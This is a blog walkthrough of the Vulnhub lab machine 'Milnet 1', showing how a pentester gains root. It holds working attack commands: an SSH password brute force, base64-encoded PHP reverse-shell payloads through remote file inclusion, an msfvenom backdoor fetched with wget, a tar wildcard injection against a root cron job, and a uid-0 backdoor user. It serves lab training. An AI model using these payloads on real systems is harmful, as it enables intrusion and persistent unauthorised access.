Vulnhub Walkthrough: Milnet 1

In this post we examine Milnet, a vulnerable target hosted on http://www.vulnhub.com

The pentester began by identifying the IP address of the target using netdiscover.

root@kali2:~# netdiscover -r 192.168.73.0/24        

192.168.73.130  00:0c:29:bd:ec:5f   1   60  VMware, Inc.           

The pentester used nmap to identify network applications.

root@kali2:~# nmap -Pn -n -p- -T4 192.168.73.130

22/tcp open  ssh

80/tcp open  http

root@kali2:~# nmap -A -Pn -n -p 22,80 192.168.73.130

22/tcp open  ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80/tcp open  http lighttpd 1.4.35


The target does not appear to be vulnerable to remote access exploits. The pentester initiated a password attack against the SSH service using THC Hydra.

root@kali2:/usr/share/wordlists# hydra -l root -P fasttrack.txt -e nsr ssh://192.168.73.130

With the password attack underway, the pentester began enumerating the web server with Nikto. The scan results indicated that a web page, /info.php, was present and may contain sensitive information.

root@kali2:/# nikto -h 192.168.73.130

+ /info.php: Output from the phpinfo() function was found.

+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.

The pentester then began a manual examination of the web server by browsing to each page, reviewing the source code, and understanding the functionality of the web site. After an initial examination, the pentester browsed to the following URI:

http://192.168.73.130/info.php

This page contains a significant amount of information regarding the PHP version running on the web server.

1

One entry catches the pentester’s eye, which suggests that a file inclusion vulnerability may be present:

allow_url_include: on

2

The pentester needs more information to construct an effective attack. The pentester utilized OWASP-ZAP to scan the target web server for vulnerabilities.

root@kali2:/# owasp-zap &

3

OWASP-ZAP reported a remote file inclusion vulnerability affecting URI: http://192.168.73.130/content.php in the POST parameter of the HTTP header.

To prepare a file inclusion attack, the pentester enabled the Firefox web browser extension, Tamper Data, which functions as a proxy to intercept HTTP requests and modify GET/POST parameters. The pentester opened a netcat listener on TCP port 80, and prepared a test exploit in Tamper data by browsing to the afflicted URI, intercepting the request, and modifying the POST parameter value with a test exploit string. After submitting the request, the pentester confirms that this is a classic remote file inclusion vulnerability.

4

5
The pentester tried uploading various backdoors and reverse shell PHP code; however, the environment prevented the code from executing. Instead, the pentester refined his exploitation to utilize a PHP data stream exploit, which can result in arbitrary code execution.

The pentester first crafted a test command in PHP:

<?php system(‘ls -lsa /bin’); ?>

The pentester took the above string, and converted it to base64 using an online base64 encoder.

Next, the pentester constructed the following string:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdscyAtbHNhIC9iaW4nKTsgPz4=

The pentester then repeated the initial RFI exploit method, this time using the crafted base64 command in the POST parameter value. It works, and the pentester receives the output of the ls -lsa /bin command, revealing various binaries in the /bin directory. The pentester identifies netcat in this directory, and prepares a new attack to achieve a remote shell.

First, the pentester opens a listener on his attack platform:

nc -nlvp 1234

Next, the pentester crafts a reverse shell one liner. Notice that traditional netcat reverse shells do not work in this environment; instead, the following string was constructed to achieve the same effect:

<?php system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.73.133 1234 >/tmp/f’); ?>

The pentester took the above string and base64 encoded it. The pentester then crafted the following string, which will serve as our reverse shell payload:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjczLjEzMyAxMjM0ID4vdG1wL2YnKTsgPz4=

As before, the pentester took the reverse shell payload string and inserted it into the POST parameter value of the /content.php request using Tamper Data. The pentester then received a reverse shell with low level privileges of the www-data user.

6

7

The pentester then began post exploitation activities, focusing on privilege escalation. First, the pentester needed a shell with greater stability. To achieve this, the pentester used msfvenom to create a new reverse shell payload. The pentester then hosted it in a web server, and used wget from the target to download the file.

On Attack Platform:

service apache2 start

cd /var/www/html

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.73.133 lport=4444 -f elf -o backdoor.elf

nc -nlvp 4444

On Target/Victim

cd /tmp

wget http://192.168.73.133/backdoor.elf

chmod 755 backdoor.elf

./backdoor.elf &

The pentester now had a more stable shell to the victim. The pentester then used python to spawn a tty terminal for greater functionality.

python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

Now the pentester focused on privilege escalation. The pentester used an automated script to examine the target for any possible privilege escalation vulnerabilities. The privilege escalation script can be downloaded from:

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

On Target/Victim:

cd /tmp

wget http://192.168.73.133/linenum.sh   

chmod 755 linenum.sh

./linenum.sh

The script will run through many entries on the system to find possible vulnerabilities. The pentester noticed several entries of interest.

A user known as T. G. Langman appears to be the only conventional user account on the system.

langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

His home directory is world readable and executable.

drwxr-xr-x  4 langman langman 4.0K May 21 22:27 langman

There is also a backup script that runs every minute.

Cronjob

*/1 *     * * *     root    /backup/backup.sh

The pentester examined the contents of  /backup/backup.sh and observes that it uses tar to backup the contents of the /var/www/html directory every minute. This does not appear overtly vulnerable.

#!/bin/bash

cd /var/www/html

tar cf /backup/backup.tgz *

Remembering that Langman’s directory was not read or execute restricted, the pentester navigated to his directory and began examining his files, finding one of particular interest:

cd /home/langman/SDINET

less DefenseCode_Unix_WildCards_Gone_Wild.txt

Section 4.3 of DefenseCode_Unix_WildCards_Gone_Wild.txt reveals a shell command injection technique targeting tar. In essence, the technique works by creating files whose filename contains parameters and arguments that can be injected into shell commands, if the proper conditions exist. The pentester crafts commands in order to try this technique.

First, the pentester opened an additional listener on his attack platform:

nc -nlvp 2112

On the target/victim, the pentester crafts three files to achieve arbitrary command execution stemming from the tar command within the backup.sh script.

cd /var/www/html

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.73.133 2112 >/tmp/f” > shell.sh

touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”

touch “/var/www/html/–checkpoint=1”

In essence, the crafted filenames cause the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 2112.

8

After about 1 minute, the pentester receives a callback and with it, root permissions. The pentester now has total control over the system.

9

To sustain easy access, the pentester created a new user with root privileges.

useradd -ou 0 -g 0 michael

passwd michael

Conclusion:

This was target was a great exercise in remote file inclusions and shell poisoning. The best ways of mitigating these issues is by sanitizing user inputs. Remember the old adage of programming: garbage in, garbage out. Thanks for the great exercise Warrior. See you next time on noob2root. Cheers.

Advertisements

3 thoughts on “Vulnhub Walkthrough: Milnet 1

  1. Hi, I cannot for the life of me get OWASP ZAP to show an alert for RFI. Ive looked for how to configure it etc, and updating it but it still fails to show the alert. Any tips?? 🙂

    Like

    1. Hi Meme, thanks for reading. I understand your frustration with OWASP ZAP not working as expected. Try entering the URL as:
      http://IP/content.php
      And then relaunch the scan.
      If that doesn’t work, try running OWASP ZAP in the latest version of Kali 2 and make sure everything is upgraded/updated. If that doesn’t work, consider uninstalling and reinstalling OWASP ZAP. If all else fails, verify the finding manually. Good luck!

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s